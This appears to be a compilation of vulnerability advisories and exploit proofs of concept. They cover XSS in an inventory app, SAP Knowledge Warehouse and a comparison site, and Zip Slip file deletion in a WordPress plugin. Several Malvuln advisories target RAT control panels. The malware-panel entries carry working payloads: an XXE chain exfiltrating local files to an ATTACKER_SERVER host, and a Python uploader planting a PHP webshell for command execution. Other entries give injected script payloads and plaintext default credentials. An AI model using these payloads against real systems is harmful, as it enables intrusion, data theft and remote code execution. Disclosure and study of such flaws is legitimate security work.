<pre><code>## Title: Inventory Management System 1.0 XSS Stored <br />## Author: Hejap Zairy<br />## Date: 12.07.2022<br />## Vendor: https://www.vetbossel.in/inventory-management-system-php/<br />## Software: https://cutt.ly/lOZ8lrr<br />## Reference: https://github.com/Matrix07ksa<br /># Tested on: ArchLinux, MySQL, Apache<br /><br />## Description:<br />Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.<br /><br />Status: CRITICAL<br />[+] Payloads:<br />```<br />https://0day_script.gov//Inventory_Modify.php<br /><img src=1 href=1 onerror="javascript:alert('HEJAP ZAIRY AL-SHARIF')"></img><br />```<br /><br />## Proof and Exploit:<br />https://streamable.com/4v5h6u<br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)<br /># Date: 02-17-2022<br /># Exploit Author: Ceylan Bozoğullarından<br /># Blog Post: https://bozogullarindan.com/en/2022/01/wordpress-iq-block-country-1.2.13-admin-arbitray-file-deletion-via-zip-slip/<br /># Software Link: https://en-gb.wordpress.org/plugins/iq-block-country/<br /># Version: 1.2.12<br /># Tested on: Linux<br /># CVE: CVE-2022-0246 (https://wpscan.com/vulnerability/892802b1-26e2-4ce1-be6f-71ce29687776)<br /><br /><br /># Description:<br /><br />iQ Block Country is a Wordpress plugin that allows you to limit access to your website content. It can allow or disallow visitors from defined countries to (parts of) the content of the website.<br /><br />The settings of the plugin can be exported or imported using its backup functionality. An authorized user can import preconfigured settings of the plugin by uploading a zip file. After the uploading process, files in the uploaded zip file are extracted one by one. During the extraction process, existence of a file is checked. If the file exists, it is deleted without any security control by only considering the name of the extracted file. This behavior leads to “Zip Slip” vulnerability.<br /><br />Zip Slip can cause damage by overwriting configuration files or other sensitive resources. In this finding, An attacker can exploit this vulnerability and the behavior of the extraction process, to delete an arbitrary file in the server. For doing this, it is enough to upload a zip file containing a file that is named as the path of a file which is desired to be deleted.<br /><br />The details of the discovery are given below.<br /><br /># Steps To Reproduce:<br /><br />1. Install and activate the iQ Block Country plugin.<br />2. Create a test file in the vulnerable system: (e.g. /var/www/html/test.txt)<br />3. Create a zip file containing a file named as ../../../../test.txt. Absolute path at the end of this process will be: /var/www/html/wp-content/uploads/2022/01/../../../../test.txt<br />4. Go back to the Wordpress, visit Settings > iQ Block Country > Import/Export tab.<br />5. Click the “Browse” button and choose the zip file which is created in the Step 3.<br />6. Click the “Restore settings” button.<br />7. “Invalid file” message will be appeared but nevermind the message. Check whether the test.txt file is deleted or not.<br /><br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: SAP Knowledge Warehouse<br />Vendor URL: https://help.sap.com/viewer/816f1f952d244bbf9dd5063e2a0e66b0/7.5.21/en-US/4dc9605e4a9d6522e10000000a15822b.html<br />Type: Cross-Site Scripting [CWE-79]<br />Date found: 2021-09-21<br />Date published: 2022-03-17<br />CVSSv3 Score: 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)<br />CVE: CVE-2021-42063<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />SAP Knowledge Warehouse - versions 7.30, 7.31, 7.40, 7.50<br /><br /><br />4. INTRODUCTION<br />===============<br />The SAP Knowledge Warehouse (SAP KW) is the SAP Solution for all the <br />material used in training, documentation and handbooks.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The endpoint at /SAPIrExtHelp is vulnerable to an unauthenticated<br />reflected Cross-Site Scripting vulnerability when user-supplied input<br />to the URI is processed by the web application. Since the application <br />does not properly validate and sanitize this input, it is possible to <br />place arbitrary script code onto the same page.<br /><br />The following Proof-of-Concept triggers this vulnerability:<br />https://localhost/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp<br /><br /><br />6. RISK<br />=======<br />To successfully exploit this vulnerability an unauthenticated or <br />authenticated user must be tricked into visiting an arbitrary website<br />/ link.<br /><br />The vulnerability can be used to temporarily embed arbitrary script <br />code into the context of the web interface, which offers a wide range <br />of possible attacks such as redirecting the user to a malicious page, <br />spoofing content on the page or attacking the browser and its plugins. <br /><br /><br />7. SOLUTION<br />===========<br />Update SAP Knowledge Warehouse to the latest version.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2021-09-21: Discovery of the vulnerability<br />2021-09-21: Contacted the vendor via their contact mail address<br />2021-09-21: Vendor response<br />2021-10-05: Requested status update from vendor<br />2021-10-06: Vendor acknowledges the vulnerability<br />2021-10-26: Requested status update from vendor<br />2021-10-27: Vendor states that they are still working on the issue<br />2021-11-04: CVE requested from SAP (responsible CNA)<br />2021-11-10: Vendor refuses to assign a CVE because they only assign CVEs when a security fix gets released<br />2021-11-10: Vendor asks not to disclose any details related to this bug by referring to their legal terms at https://wiki.scn.sap.com/wiki/display/PSR/Disclosure+Guidelines+for+SAP+Security+Advisories <br />2021-11-10: Complained about vendor's legal terms which hold researchers accountable for "any harm to SAP users"<br />2021-11-10: Asked for the release date of the patch<br />2021-11-10: Vendor refuses to provide the release date due to "legal perspectives"<br />2021-11-10: Told the vendor that I do not agree to their legal terms and therefore all future vulnerabilities will be disclosed without prior notification<br />2021-11-21: No vendor response<br />2021-11-21: Asked for a status update<br />2021-11-23: Vendor wants to have a phone call instead<br />2021-11-23: Rejected the phone call due to their squishy legal terms<br />2021-11-29: Vendor provides the assigned CVE-2021-42063<br />2021-11-29: Vendor asks not to release any details until December patch day (14th)<br />2021-12-13: Vendor provides information on the security note for December patch day<br />2021-12-13: Vendor asks for a 3-month grace period before doing the disclosure<br />2022-03-15: Sent notification about the upcoming public disclosure on 2022-03-17<br />2022-03-17: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+December+2021<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42063<br />https://launchpad.support.sap.com/#/notes/3102769<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Simple Mobile Comparison Website v1.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)<br /># Author: Ayedh AlQahtani<br /># Discovery Date: 2022-03-18<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Tested Version: v1.0<br /># Tested on: XAMPP, Windows 11 Pro x64 es<br /># Vulnerability Type: Reflected Cross-Site Scripting (XSS)<br /><br /># Proof of Concept:<br /><br />http://<ip>/mcw/?search="><script>alert(1)</script><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/531d8b4ac8f7eb827d62424169321b2b.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: BuilderRevengeRAT - (Revenge-RAT v0.3)<br />Vulnerability: XML External Entity Injection<br />Description: The malware listens on TCP port 333. There is a Config.xml file used by the RAT builder to specify port, notification, webcam etc. The XML parser used by the RAT is vulnerable to XML Injection, this can allow local file exfiltration to a remote attacker server and or Geo location disclosure of the RAT builder.<br />Family: Revenge<br />Type: PE32<br />MD5: 531d8b4ac8f7eb827d62424169321b2b<br />Vuln ID: MVID-2022-0521<br />Disclosure: 03/17/2022<br /><br />Exploit/PoC:<br />1) python -m http.server (Port 8000)<br /><br />2) "payload.dtd"<br /><?xml version="1.0" encoding="UTF-8"?><br /><!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER_SERVER:8000?%file;'>"><br />%all;<br /><br />3) "Config.xml"<br /><br /><?xml version="1.0" encoding="utf-8"?><br /><!DOCTYPE MALVULN [ <br /><!ENTITY % file SYSTEM "C:\BuilderRevengeRAT\Revenge-RAT v0.3\Database\2022-03-16\3-57-36 PM.log"><br /><!ENTITY % dtd SYSTEM "http://ATTACKER_SERVER:8000/payload.dtd"><br />%dtd;]><br /><pwn>&send;</pwn><br /><br />4) Run the "Revenge-RAT v0.3.exe" malware<br /><br />Result...<br /><br />Serving HTTP on 0.0.0.0 port 8000 ...<br />DESKTOP-2C3IQHO - - [16/Mar/2022 16:12:40] "GET /payload.dtd HTTP/1.1" 200 -<br />DESKTOP-2C3IQHO - - [16/Mar/2022 16:12:40] "GET /?[%203:57:37%20PM%20]%20Revenge%20Started%20..%7C...%7CUnknown.png%7C[%203:57:45%20PM%20]%20Listening%20:%20333%7C...%7CUnknown.png%7C HTTP/1.1" 301 -<br />DESKTOP-2C3IQHO - - [16/Mar/2022 16:12:40] "GET /?[%203:57:37%20PM%20]%20Revenge%20Started%20..%7C...%7CUnknown.png%7C[%203:57:45%20PM%20]%20Listening%20:%20333%7C...%7CUnknown.png%7C/ HTTP/1.1" 200 -<br />DESKTOP-2C3IQHO - - [16/Mar/2022 16:15:14] "GET /payload.dtd HTTP/1.1" 200 -<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/838f67d7a4b6824ec59892057aab3bb7_C.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: BuilderTorCTPHPRAT.b<br />Vulnerability: Remote Persistent XSS<br />Family: TorCTPHPRAT<br />Type: WebUI<br />MD5: 838f67d7a4b6824ec59892057aab3bb7 (Webremote TorCT Client.exe)<br />MD5: dc40fa699cfce01802213dbbd0cbe37e (SlaveOnline.php)<br />Vuln ID: MVID-2022-0520<br />Disclosure: 03/17/2022<br />Description: The TorCT client malwares web-panel allows unauthenticated users to write data to the Slaves.txt file. There is no secure coding practice or filtering of input or sanitization of output. Third-party attackers who can reach the server can make HTTP Post requests writing arbitrary JS code into the Slaves.txt file. The XSS payload will execute client side code in the security context of the currently logged on user anytime the WebUI is accessed. This can result in data modification, theft or GEO location disclosure of the user accessing the TorCT WebUI.<br /><br />"SlaveOnline.php" code snippet:<br /><br />$fn= $_GET['online'];<br />$ip = $_SERVER['REMOTE_ADDR'];<br />$extrainfo = $_GET['info'];<br />$emptystring = "";<br /><br />function visitor_country() {<br /> $ip = $_SERVER["REMOTE_ADDR"];<br /> if(filter_var(@$_SERVER['HTTP_X_FORWARDED_FOR'], FILTER_VALIDATE_IP))<br /> $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];<br /> if(filter_var(@$_SERVER['HTTP_CLIENT_IP'], FILTER_VALIDATE_IP))<br /> $ip = $_SERVER['HTTP_CLIENT_IP'];<br /> $derp = @json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=" . $ip));<br /> $result1=$derp ->geoplugin_countryCode;<br />$result2=$derp ->geoplugin_countryName;<br />$result = "[".$result1."] - ".$result2;<br /> return $result;<br />}<br /><br />$countryname = visitor_country();<br />if ($extrainfo == "") { $extrainfo = "||||";}<br />$extrainfo = $extrainfo."|||||";<br />$file = file_get_contents('./Slaves.txt', False);<br />$write = $countryname."|".$_SERVER['REMOTE_ADDR'] . "|" .$extrainfo. "+" ;<br />echo $file;<br /><br />etc...<br /><br />Exploit/PoC:<br />curl "http://TorCTPHPRAT_SERVER_IP/New_TorCT_6_22_1_6/UPLOAD%20%20(New%20PHP%20FILES)/SlaveOnline.php?online=1&info=%3Cscript%3Ealert('malvuln')%3C/script%3E"<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/838f67d7a4b6824ec59892057aab3bb7_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: BuilderTorCTPHPRAT.b<br />Vulnerability: Arbitrary File Upload - RCE<br />Family: TorCTPHPRAT<br />Type: WebUI<br />MD5: 838f67d7a4b6824ec59892057aab3bb7 (Webremote TorCT Client.exe)<br />MD5: b54822058a3ed33c673d06113b453ebe (upload.php)<br />Vuln ID: MVID-2022-0519<br />Disclosure: 03/17/2022<br />Description: The TorCT client malwares web-panel allows unauthenticated uploads and does not check the expected file type E.g. ".png". Third-party attackers who can reach the server can upload their own backdoor PHP webshell and execute any commands on the malwares C2 server.<br /><br />"upload.php" vulnerable code:<br /><br />$DelOrNot = $_GET['D'];<br /><br />if ($DelOrNot == "true")<br />{<br /><br />unlink('Upload/1.png');<br />unlink('Upload/2.png');<br />}else{<br /><br />$uploadDir = 'Upload/'; <br />$uploadFile = $uploadDir . basename($_FILES['file']['name']);<br />if (is_uploaded_file($_FILES['file']['tmp_name'])) <br />{<br /> echo "File ". $_FILES['file']['name'] ." is successfully uploaded!\r\n";<br /> if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadFile)) <br /> {<br /> echo "File is successfully stored! ";<br /> }<br /> else print_r($_FILES);<br />}<br />else <br />{<br /> echo "Upload Failed!";<br /> print_r($_FILES);<br />}<br />}<br /><br /><br />Exploit/PoC:<br />1) Create PHP webshell "pwn.php", exec($_GET['cmd']);<br /><br />2) Create Python uploader "torct_webshell.py"<br />import requests<br /><br />url="http://TORCT_PHP_RAT_SERVER/BuilderTorCTPHPRAT.b/New_TorCT_6_22_1_6/UPLOAD%20%20(New%20PHP%20FILES)/upload.php"<br /><br />files = {'file': open('pwn.php', 'rb')}<br />r = requests.post(url, files=files)<br />if r.status_code==200:<br /> print(r.status_code)<br /> print("TorCTPHPRAT PWNED!")<br /><br />3) Exploit<br />curl "http://127.0.0.1/BuilderTorCTPHPRAT.b/New_TorCT_6_22_1_6/UPLOAD%20%20(New%20PHP%20FILES)/upload/pwn.php?cmd=calc.exe"<br /><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/838f67d7a4b6824ec59892057aab3bb7.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: BuilderTorCTPHPRAT.b<br />Vulnerability: Insecure Credential Storage<br />Description: The default password for the TorCT client malwares web-panel is "ww" and is stored in cleartext within the "password.php" file.<br />Family: TorCTPHPRAT<br />Type: WebUI<br />MD5: 838f67d7a4b6824ec59892057aab3bb7 (Webremote TorCT Client.exe)<br />MD5: 43d146da154d42e721b83e53a5670f14 (password.php)<br />Vuln ID: MVID-2022-0518<br />Disclosure: 03/17/2022<br /><br />Exploit/PoC:<br />"password.php"<br /><br />// If you want to change your password, <br />// please edit it like this: $password = "example1"; This will make the password: example1<br />// By default the password is: $password = "ww";<br />$password = "ww";<br />$ClientPassword = "False"; // Change in True if you want a password for your client<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/ae4a409d217bbd538009fbbb5457e754.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: BuilderPandoraRat.b - (Pandora Rat 2.2 [Beta].exe)<br />Vulnerability: Insecure Credential Storage<br />Description: The malware listens on TCP port 6622. Credentials are stored in plaintext in Settings.ini file and default password is blank.<br />Family: Pandora<br />Type: PE32<br />MD5: ae4a409d217bbd538009fbbb5457e754<br />Vuln ID: MVID-2022-0517<br />Disclosure: 03/17/2022<br /><br /><br />Exploit/PoC:<br />Settings.ini<br /><br />[Options]<br />Ports=6622#6622#<br />Password=malvuln<br />Notify=0<br />Upnp=0<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/cc3670f1b3e60e00b43c86d787563a44_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: BuilderOrcus (Orcus.Administration-cracked.exe)<br />Vulnerability: Insecure Credential Storage<br />Description: The malware stores its password in plaintext in a settings.json file.<br />Family: BuilderOrcus<br />Type: PE32<br />MD5: cc3670f1b3e60e00b43c86d787563a44<br />Vuln ID: MVID-2022-0516<br />Disclosure: 03/17/2022<br /><br /><br />Exploit/PoC:<br />settings.json snippet.<br /><br />{<br /> "IpAddresses": [<br /> {<br /> "Ip": "127.0.0.1",<br /> "Port": 10134<br /> },<br /> {<br /> "Ip": "0.0.0.0",<br /> "Port": 10134<br /> }<br /> ],<br /> "Password": "malvuln",<br /> "IsDnsUpdaterEnabled": false,<br /> "DnsUpdaterSettings": null,<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>